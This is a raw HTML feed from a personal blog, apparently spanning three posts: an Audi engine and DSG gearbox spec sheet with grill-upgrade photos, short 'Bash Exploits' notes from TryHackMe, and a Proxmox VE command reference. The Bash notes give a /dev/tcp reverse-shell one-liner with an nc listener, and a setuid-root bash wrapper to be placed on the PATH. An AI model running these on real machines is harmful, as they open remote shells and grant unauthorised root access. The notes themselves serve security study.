/></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div>Engine 2.0 TFSI 1,984 cc (121 cu in) I4</div><div><table class="wikitable" style="background-color: #f8f9fa; border-collapse: collapse; border: 1px solid rgb(162, 169, 177); color: #202122; font-family: sans-serif; font-size: 13.3px; margin: 1em 0px; text-align: center;"><tbody><tr><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">CCZA</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">200 PS (147 kW; 197 hp)</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">280 N⋅m (207 lb⋅ft) at 1,700–5,000 rpm</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">6.8<span class="nowrap" style="text-wrap: nowrap;"> </span>s</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">2009–2013</td></tr></tbody></table></div><div><p>Transmission 6 Speed Transverse Mounted S-Tronic DSG </p></div><div><table class="wikitable" style="background-color: #f8f9fa; border-collapse: collapse; border: 1px solid rgb(162, 169, 177); color: #202122; font-family: sans-serif; font-size: 14px; margin: 1em 0px;"><tbody><tr><th style="background-color: #eaecf0; border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em; text-align: center;">Name</th><th style="background-color: #eaecf0; border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em; text-align: center;">Orientation</th><th style="background-color: #eaecf0; border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em; text-align: center;">Ratios</th><th style="background-color: #eaecf0; border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em; text-align: center;">Max. torque (N·m)</th><th style="background-color: #eaecf0; border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em; text-align: center;">Clutch type</th><th style="background-color: #eaecf0; border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em; text-align: center;">Comments</th></tr></tbody></table></div><div><table class="wikitable" style="background-color: #f8f9fa; border-collapse: collapse; border: 1px solid rgb(162, 169, 177); color: #202122; font-family: sans-serif; font-size: 14px; margin: 1em 0px;"><tbody><tr><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">DQ250</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">Transverse</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">6</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">400</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">Wet</td><td style="border: 1px solid rgb(162, 169, 177); padding: 0.2em 0.4em;">6-speed DSG transmission with wet clutch, most found on VAG-cars from 2003 till present day</td></tr></tbody></table></div><div><p style="background-color: white; color: #202122; font-family: sans-serif; font-size: 14px; margin: 0.5em 0px 1em;">A <b>direct-shift gearbox</b> (<b>DSG</b>, <a href="https://en.wikipedia.org/wiki/German_language" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="German language">German</a>: <i lang="de">Direktschaltgetriebe</i><sup class="reference" id="cite_ref-1" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-1" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[1]</a></sup>)<sup class="reference" id="cite_ref-VMS_2-0" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-VMS-2" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[2]</a></sup><sup class="reference" id="cite_ref-AboutCars_3-0" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-AboutCars-3" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[3]</a></sup> is an electronically controlled, <a href="https://en.wikipedia.org/wiki/Dual-clutch_transmission" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Dual-clutch transmission">dual-clutch</a>,<sup class="reference" id="cite_ref-VMS_2-1" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-VMS-2" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[2]</a></sup> multiple-shaft, <a class="mw-redirect" href="https://en.wikipedia.org/wiki/Automatic_gearbox" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Automatic gearbox">automatic gearbox</a>, in either a <a href="https://en.wikipedia.org/wiki/Transaxle" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Transaxle">transaxle</a> or traditional transmission layout (depending on engine/drive configuration), with automated <a href="https://en.wikipedia.org/wiki/Clutch" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Clutch">clutch</a> operation, and with fully-automatic<sup class="reference" id="cite_ref-VMS_2-2" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-VMS-2" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[2]</a></sup> or semi-manual gear selection. The first dual-clutch transmissions were derived from <a href="https://en.wikipedia.org/wiki/Porsche" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Porsche">Porsche</a> in-house development for the <a href="https://en.wikipedia.org/wiki/Porsche_962" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Porsche 962">Porsche 962</a> in the 1980s.</p></div><div><p style="background-color: white; color: #202122; font-family: sans-serif; font-size: 14px; margin: 0.5em 0px 1em;">In simple terms, a DSG automates two separate "manual" gearboxes (and clutches) contained within one housing and working as one unit.<sup class="reference" id="cite_ref-VMS_2-3" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-VMS-2" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[2]</a></sup><sup class="reference" id="cite_ref-AboutCars_3-1" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-AboutCars-3" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[3]</a></sup><sup class="reference" id="cite_ref-DCTfactsHow_4-0" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-DCTfactsHow-4" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[4]</a></sup> It was designed by <a href="https://en.wikipedia.org/wiki/BorgWarner" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="BorgWarner">BorgWarner</a> and is licensed to the <a href="https://en.wikipedia.org/wiki/Volkswagen_Group" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Volkswagen Group">Volkswagen Group</a>, with support by <a class="mw-redirect" href="https://en.wikipedia.org/wiki/IAV" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="IAV">IAV GmbH</a>.<sup class="noprint Inline-Template Template-Fact" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap;">[<i><a href="https://en.wikipedia.org/wiki/Wikipedia:Citation_needed" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Wikipedia:Citation needed"><span title="This claim needs references to reliable sources. (November 2009)">citation needed</span></a></i>]</sup> By using two independent clutches,<sup class="reference" id="cite_ref-VMS_2-4" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-VMS-2" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[2]</a></sup><sup class="reference" id="cite_ref-DCTfactsHow_4-1" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-DCTfactsHow-4" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[4]</a></sup> a DSG can achieve faster <a href="https://en.wikipedia.org/wiki/Shift_time" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Shift time">shift times</a><sup class="reference" id="cite_ref-VMS_2-5" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-VMS-2" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[2]</a></sup><sup class="reference" id="cite_ref-DCTfactsHow_4-2" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-DCTfactsHow-4" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[4]</a></sup> and eliminates the <a href="https://en.wikipedia.org/wiki/Torque_converter" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Torque converter">torque converter</a> of a conventional <a href="https://en.wikipedia.org/wiki/Epicyclic_gearing" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Epicyclic gearing">epicyclic</a> <a href="https://en.wikipedia.org/wiki/Automatic_transmission" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;" title="Automatic transmission">automatic transmission</a>.<sup class="reference" id="cite_ref-VMS_2-6" style="font-size: 11.2px; line-height: 1; text-wrap: nowrap; unicode-bidi: isolate;"><a href="https://en.wikipedia.org/wiki/Direct-shift_gearbox#cite_note-VMS-2" style="background: none; color: #3366cc; overflow-wrap: break-word; text-decoration-line: none;">[2]</a></sup></p></div></blockquote><p><br /></p><p>Before Updating the grill:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtmZfsrx1c7Do4NpwQQyLXXOplp95WDUeieelCqQD4OANnq2H-TjV1YlLCwvnpX6LyzoNWTEDCre4BW_MsxAD3u9Kcr8IgFNVS0TYHzGdp99ckO3_bkooOeLb6ZsyLfhwrRJVvzo6jjB-MiclRhnNq-7VJfv5nf9uzqMQsbv9MsCIqNBQJ_k41X5oiU3kg/s2992/20240218_150557.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtmZfsrx1c7Do4NpwQQyLXXOplp95WDUeieelCqQD4OANnq2H-TjV1YlLCwvnpX6LyzoNWTEDCre4BW_MsxAD3u9Kcr8IgFNVS0TYHzGdp99ckO3_bkooOeLb6ZsyLfhwrRJVvzo6jjB-MiclRhnNq-7VJfv5nf9uzqMQsbv9MsCIqNBQJ_k41X5oiU3kg/s320/20240218_150557.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ_JKfE7Oeg0muYI1ilC9FEL2poJnlLPXm220FYnQGVIggB8FVwpZtbt7r40f6EIV9JWpPGrOA7KeSOxaTraFaitwiXsAQW6SUafxKSALJ8LAde1GEdgMTq6g3tR9xGk3uv0d8iOueD2dJeG5rMLxSj7gF5AzrcN4kkoAoMSfqteYfR2PtWcZOqKMY09pn/s854/20240219_002823.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="854" data-original-width="810" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ_JKfE7Oeg0muYI1ilC9FEL2poJnlLPXm220FYnQGVIggB8FVwpZtbt7r40f6EIV9JWpPGrOA7KeSOxaTraFaitwiXsAQW6SUafxKSALJ8LAde1GEdgMTq6g3tR9xGk3uv0d8iOueD2dJeG5rMLxSj7gF5AzrcN4kkoAoMSfqteYfR2PtWcZOqKMY09pn/s320/20240219_002823.jpg" width="304" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1GciTENNr1tumtXAStWi-BTEDIout-FK0eGhhKhtFzgZYymylnt9rcR6cpjfzD-fnApRzpzjp6yYLA2SASV_P475CReN6FkRGX9raC6u8BVUAOY8VQdLcJoZagIwBv76-WORZnrM7jLO3TkAIJwYum20SJeyjNa1rZU8a_KVmYZvnJJ4Ud5_RW9ufGmfq/s2992/20240218_170316.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1GciTENNr1tumtXAStWi-BTEDIout-FK0eGhhKhtFzgZYymylnt9rcR6cpjfzD-fnApRzpzjp6yYLA2SASV_P475CReN6FkRGX9raC6u8BVUAOY8VQdLcJoZagIwBv76-WORZnrM7jLO3TkAIJwYum20SJeyjNa1rZU8a_KVmYZvnJJ4Ud5_RW9ufGmfq/s320/20240218_170316.jpg" width="320" /></a></div><br /><p><br /></p><p>After upgrading to honeycomb grill: </p><div><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf-y17Dp9ncf4lNxQH4IMv_0f4fT8oZvqL9CiyfZYL7RWNVLQ3CDJ1RC5vEM235ENRFVJnSpgL1frG34FCXwRMiD56ucT-c3usK1DCxdhLigy4yN7-696XQkiTZIPlUp9JD3XDc3neFre6YzJIsMXFoEwuScMs8XsK6OeOPazaqIJ9yTpkdVSQVmrcGOW1/s2992/20240228_120455.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf-y17Dp9ncf4lNxQH4IMv_0f4fT8oZvqL9CiyfZYL7RWNVLQ3CDJ1RC5vEM235ENRFVJnSpgL1frG34FCXwRMiD56ucT-c3usK1DCxdhLigy4yN7-696XQkiTZIPlUp9JD3XDc3neFre6YzJIsMXFoEwuScMs8XsK6OeOPazaqIJ9yTpkdVSQVmrcGOW1/s320/20240228_120455.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbhSOPRRLCyijMvGwtAOGUPzQF8xDxSW36DtADWI5jSfn6ARBkPXKfuztfjXYaXWn3FSRgbX7q-lBIWGQiSKNpRQSYW07rZ5cGOWLKwutoEDMxEiynLKFYEXpZly-zbYcUUW0GoWiY1TtoxnY_7iBLZDf-pBsHgJzcEjOhSjtcKfHRwGKoxE6ZJCVVkDyb/s2992/20240228_120503.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbhSOPRRLCyijMvGwtAOGUPzQF8xDxSW36DtADWI5jSfn6ARBkPXKfuztfjXYaXWn3FSRgbX7q-lBIWGQiSKNpRQSYW07rZ5cGOWLKwutoEDMxEiynLKFYEXpZly-zbYcUUW0GoWiY1TtoxnY_7iBLZDf-pBsHgJzcEjOhSjtcKfHRwGKoxE6ZJCVVkDyb/s320/20240228_120503.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzDzZfHIW_Ecpssc7QQHv6zjDUT8PyzjcwgQSRWd_16H1Vh34dIZPR04ssKgcyxlprNHUHfaRveSrnKW7irrmLvNrSzCyrK_2XyfatedLVb8DQff8qLlrZDWKrKLd2NO1LH9lf_XUb4dnjD6C6kti4MJNRtScOIMXXI4h4q3FwT0R6b61HCgODD8iN811g/s2992/20240228_120515.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzDzZfHIW_Ecpssc7QQHv6zjDUT8PyzjcwgQSRWd_16H1Vh34dIZPR04ssKgcyxlprNHUHfaRveSrnKW7irrmLvNrSzCyrK_2XyfatedLVb8DQff8qLlrZDWKrKLd2NO1LH9lf_XUb4dnjD6C6kti4MJNRtScOIMXXI4h4q3FwT0R6b61HCgODD8iN811g/s320/20240228_120515.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQLXxG6FMMU4SdJVEUpDBEtHw-R_IlTSoc1-1RRlBquu95v2f6QJYKjZsheUN_VZsRBPINQE8ERh8cmu5pvyyJjxcCWEYF1-2dgEjMWqd4Eo5JyXv3v4Ngb2Hvyzu___VB_d2OazxUiR8gEKyNxeJbO5RMcg6KtwR9pfcbn-WbjqNVxDF3IbFkCqicOw7T/s2992/20240228_120535.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQLXxG6FMMU4SdJVEUpDBEtHw-R_IlTSoc1-1RRlBquu95v2f6QJYKjZsheUN_VZsRBPINQE8ERh8cmu5pvyyJjxcCWEYF1-2dgEjMWqd4Eo5JyXv3v4Ngb2Hvyzu___VB_d2OazxUiR8gEKyNxeJbO5RMcg6KtwR9pfcbn-WbjqNVxDF3IbFkCqicOw7T/s320/20240228_120535.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibRwa6C5MhV6oMLIyurNq27ok-llptK9IIrn0PizS6AVX_UVmMyn7fWZadmFwNot5p3pMCHLIYkfUyxy-e4D-jqg3FqVLYAQtXMtBnI9qYfy703gUqoeZeBpErDhzFVUHM8GqEj94rkdEjboqmfvF-ZFankxsHwE3rEyGs_A7cf754uoQR0JaKyhO_-ZOr/s2992/20240228_120554.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibRwa6C5MhV6oMLIyurNq27ok-llptK9IIrn0PizS6AVX_UVmMyn7fWZadmFwNot5p3pMCHLIYkfUyxy-e4D-jqg3FqVLYAQtXMtBnI9qYfy703gUqoeZeBpErDhzFVUHM8GqEj94rkdEjboqmfvF-ZFankxsHwE3rEyGs_A7cf754uoQR0JaKyhO_-ZOr/s320/20240228_120554.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoZzqo1M3IF1mzt9mt4yemSbkq0baWBlt0WWv9feZlUTlfHQjSWAmt9ziL2khAVYkwHHewwP9TqmvHnMUnmWMs0PGChK_HepthEC3-Ci241fcK71RDyGCaHEbGobQZPrYBYqvST2nlkhAl6xSOaOB5qj9oZyqet_p7ufBO9Gkrr67k5JfH7HMvBoAu8Io_/s2992/20240228_120603.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoZzqo1M3IF1mzt9mt4yemSbkq0baWBlt0WWv9feZlUTlfHQjSWAmt9ziL2khAVYkwHHewwP9TqmvHnMUnmWMs0PGChK_HepthEC3-Ci241fcK71RDyGCaHEbGobQZPrYBYqvST2nlkhAl6xSOaOB5qj9oZyqet_p7ufBO9Gkrr67k5JfH7HMvBoAu8Io_/s320/20240228_120603.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZZD113Sk3yi0iWBSCE5M2N5h07cmApnbIqG8ebVjdw8QHHyC8btCcEV2-DTkWB0UUSfRpXxg6KYSmibD_XvMY4N6x580Pa4Q_k1_zqxUCodVsDwIBj4_XXSxphsZZhBwpJ887iEV3hGktBiPiqbjApixx8hToIlgrMYSD9wH2-fn1a36TZ9HRg82pcxoU/s2992/20240228_120610.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZZD113Sk3yi0iWBSCE5M2N5h07cmApnbIqG8ebVjdw8QHHyC8btCcEV2-DTkWB0UUSfRpXxg6KYSmibD_XvMY4N6x580Pa4Q_k1_zqxUCodVsDwIBj4_XXSxphsZZhBwpJ887iEV3hGktBiPiqbjApixx8hToIlgrMYSD9wH2-fn1a36TZ9HRg82pcxoU/s320/20240228_120610.jpg" width="320" /></a></div><br /> <p></p></div><div>Upgraded Stereo to Touchscreen with navigation, front, and rear cameras:</div><div><a href="https://wrightrocket.blogspot.com/2024/02/xtrons-android-auto-head-unit.html">https://wrightrocket.blogspot.com/2024/02/xtrons-android-auto-head-unit.html</a></div><div><br /></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-68195771696093010972024-01-12T23:10:00.000-08:002024-01-14T23:17:51.856-08:00Bash Exploits <h2 style="text-align: left;">Exploits for Bash on Linux</h2><h3 style="text-align: left;">TryHackMe</h3><h4 style="text-align: left;">Reverse shell</h4><div>ATTACK_IP=192.168.0.5</div><p>ATTACK_PORT=4321</p><p>bash -i >& /dev/tcp/$ATTACK_IP/$ATTACK_PORT 0>&1</p><p>If the above command can be executed on a machine to be hacked, then a user with an IP address of ATTACKER_IP like 192.168.0.5 would then be able to execute a port listener at that to wait for the connection. </p><p>Using netcat, the attacker could then listen for a connection by executing:</p><p>ATTACK_PORT=4321</p><p>nc -lvp $ATTACK_PORT</p><p>This would cause a shell to be started on the remote machine.</p><p><br /></p><h4 style="text-align: left;">SetUID & SetGid Bash </h4><h4 style="text-align: left;">subash.c</h4><p><span style="font-family: courier;">int main() {</span></p><p><span style="font-family: courier;">setuid(0);</span></p><p><span style="font-family: courier;">setgid(0);</span></p><p><span style="font-family: courier;">system("/bin/bash");</span></p><p><span style="font-family: courier;">return 0;</span></p><p><span style="font-family: courier;">}</span></p><p><br /></p><p>After creating the above file, use:</p><p><span style="font-family: courier;"><b>gcc subash.c -o subash -w</b></span></p><p><span style="font-family: courier;"><b>chmod +s subash</b></span></p><p><br /></p><p>Then, make this executable in a directory contained in the PATH variable.</p><p><br /></p><h3 style="text-align: left;">GitHub</h3><div>Just as I was thinking how I could curate various bash exploits, I found that someone had already done a great job of it:</div><div><br /></div><p><a href="https://github.com/tobor88/Bash">https://github.com/tobor88/Bash</a></p><p><br /></p><p><br /></p><div><br /></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-22528051035990952062024-01-11T14:00:00.000-08:002024-01-24T20:10:03.701-08:00Proxmox Virtual Environment (PVE) Solution for Virtual Desktop Infrastructure<h3 style="text-align: left;">Using Community version of Proxmox Virtual Environment (PVE)</h3><h4 style="text-align: left;">Using Web-based Interface of node available in the cluster of one or more nodes is the primary management tool to this incredible tool.</h4><div><div id="preamble" style="background-color: white; color: #202122; font-family: sans-serif; font-size: 14px;"><div class="sectionbody"><div class="paragraph"><p style="margin: 0.5em 0px;">"You can use the web-based administration interface with any modern browser. When Proxmox VE detects that you are connecting from a mobile device, you are redirected to a simpler, touch-based user interface.</p></div><div class="paragraph"><p style="margin: 0.5em 0px;">The web interface can be reached via <a href="https://youripaddress:8006/" style="background: none; color: #0645ad; text-decoration-line: none;">https://youripaddress:8006</a> (default login is: <em>root</em>, and the password is specified during the installation process)." - <a href="https://pve.proxmox.com/wiki/Graphical_User_Interface">https://pve.proxmox.com/wiki/Graphical_User_Interface</a></p><p style="margin: 0.5em 0px;"><br /></p><p style="margin: 0.5em 0px;">I love the custom tags for organizing collections of vms or containers.</p><pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); color: black; font-family: monospace, monospace; line-height: 1.3; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-wrap: wrap;"><tt style="font-family: monospace, monospace;"># pvesh set /cluster/options --tag-style color-map=example:000000:FFFFFF</tt></pre></div></div></div><div class="sect1" style="background-color: white; color: #202122; font-family: sans-serif; font-size: 14px;"></div></div><h4 style="text-align: left;">Full VMs using thin snapshots for storage and QEMU/KVM</h4><p><a href="https://pve.proxmox.com/wiki/Qemu/KVM_Virtual_Machines">https://pve.proxmox.com/wiki/Qemu/KVM_Virtual_Machines</a></p><p>USAGE: qm <COMMAND> [ARGS] [OPTIONS]</p><p><br /></p><p> qm cloudinit dump <vmid> <type></p><p> qm cloudinit pending <vmid></p><p> qm cloudinit update <vmid></p><p><br /></p><p> qm disk move <vmid> <disk> [<storage>] [OPTIONS]</p><p> qm disk resize <vmid> <disk> <size> [OPTIONS]</p><p> qm disk unlink <vmid> --idlist <string> [OPTIONS]</p><p> qm disk import <vmid> <source> <storage> [OPTIONS]</p><p> qm disk rescan [OPTIONS]</p><p><br /></p><p> qm guest cmd <vmid> <command></p><p> qm guest exec-status <vmid> <pid></p><p> qm guest passwd <vmid> <username> [OPTIONS]</p><p> qm guest exec <vmid> [<extra-args>] [OPTIONS]</p><p><br /></p><p> qm clone <vmid> <newid> [OPTIONS]</p><p> qm config <vmid> [OPTIONS]</p><p> qm create <vmid> [OPTIONS]</p><p> qm delsnapshot <vmid> <snapname> [OPTIONS]</p><p> qm destroy <vmid> [OPTIONS]</p><p> qm list [OPTIONS]</p><p> qm listsnapshot <vmid></p><p> qm migrate <vmid> <target> [OPTIONS]</p><p> qm pending <vmid></p><p> qm reboot <vmid> [OPTIONS]</p><p> qm reset <vmid> [OPTIONS]</p><p> qm resume <vmid> [OPTIONS]</p><p> qm rollback <vmid> <snapname> [OPTIONS]</p><p> qm sendkey <vmid> <key> [OPTIONS]</p><p> qm set <vmid> [OPTIONS]</p><p> qm shutdown <vmid> [OPTIONS]</p><p> qm snapshot <vmid> <snapname> [OPTIONS]</p><p> qm start <vmid> [OPTIONS]</p><p> qm stop <vmid> [OPTIONS]</p><p> qm suspend <vmid> [OPTIONS]</p><p> qm template <vmid> [OPTIONS]</p><p><br /></p><p> qm cleanup <vmid> <clean-shutdown> <guest-requested></p><p> qm importovf <vmid> <manifest> <storage> [OPTIONS]</p><p> qm monitor <vmid></p><p> qm mtunnel</p><p> qm nbdstop <vmid></p><p> qm remote-migrate <vmid> [<target-vmid>] <target-endpoint> --target-bridge <string> --target-storage <string> [OPTIONS]</p><p> qm showcmd <vmid> [OPTIONS]</p><p> qm status <vmid> [OPTIONS]</p><p> qm terminal <vmid> [OPTIONS]</p><p> qm unlock <vmid></p><p> qm vncproxy <vmid></p><p> qm wait <vmid> [OPTIONS]</p><p><br /></p><p> qm help [<extra-args>] [OPTIONS]</p><p><br /></p><h4 style="text-align: left;">Containers using LXC</h4><p><a href="https://pve.proxmox.com/wiki/Linux_Container">https://pve.proxmox.com/wiki/Linux_Container</a></p><p><br /></p><h4 style="text-align: left;">Template Location</h4><p>/var/lib/vz/template/iso to install Full VMs ISOs</p><p>/var/lib/vz/template/cache for container image tarballs.</p><p><br /></p><h3 style="text-align: left;">Command Line Administration </h3><p>pveam - Proxmox VE Appliance Manager</p><p>pveam update - to update available container templates</p><p>pveam available - to show available templates</p><p>pveam download local debian-10.0-standard_10.0-1_amd64.tar.gz - download container template</p><p>pveam list local - to see downloaded templates</p><p><br /></p><p>pct create 999 local:vztmpl/debian-10.0-standard_10.0-1_amd64.tar.gz - create new container</p><p>USAGE: pct <COMMAND> [ARGS] [OPTIONS]</p><p><br /></p><p> pct clone <vmid> <newid> [OPTIONS]</p><p> pct create <vmid> <ostemplate> [OPTIONS]</p><p> pct destroy <vmid> [OPTIONS]</p><p> pct list</p><p> pct migrate <vmid> <target> [OPTIONS]</p><p> pct move-volume <vmid> <volume> [<storage>] [<target-vmid>] [<target-volume>] [OPTIONS]</p><p> pct pending <vmid></p><p> pct resize <vmid> <disk> <size> [OPTIONS]</p><p> pct restore <vmid> <ostemplate> [OPTIONS]</p><p> pct template <vmid></p><p><br /></p><p> pct config <vmid> [OPTIONS]</p><p> pct set <vmid> [OPTIONS]</p><p><br /></p><p> pct delsnapshot <vmid> <snapname> [OPTIONS]</p><p> pct listsnapshot <vmid></p><p> pct rollback <vmid> <snapname> [OPTIONS]</p><p> pct snapshot <vmid> <snapname> [OPTIONS]</p><p><br /></p><p> pct reboot <vmid> [OPTIONS]</p><p> pct resume <vmid></p><p> pct shutdown <vmid> [OPTIONS]</p><p> pct start <vmid> [OPTIONS]</p><p> pct stop <vmid> [OPTIONS]</p><p> pct suspend <vmid></p><p><br /></p><p> pct console <vmid> [OPTIONS]</p><p> pct cpusets</p><p> pct df <vmid></p><p> pct enter <vmid></p><p> pct exec <vmid> [<extra-args>]</p><p> pct fsck <vmid> [OPTIONS]</p><p> pct fstrim <vmid> [OPTIONS]</p><p> pct mount <vmid></p><p> pct pull <vmid> <path> <destination> [OPTIONS]</p><p> pct push <vmid> <file> <destination> [OPTIONS]</p><p> pct remote-migrate <vmid> [<target-vmid>] <target-endpoint> --target-bridge <string> --target-storage <string> [OPTIONS]</p><p> pct rescan [OPTIONS]</p><p> pct status <vmid> [OPTIONS]</p><p> pct unlock <vmid></p><p> pct unmount <vmid></p><p><br 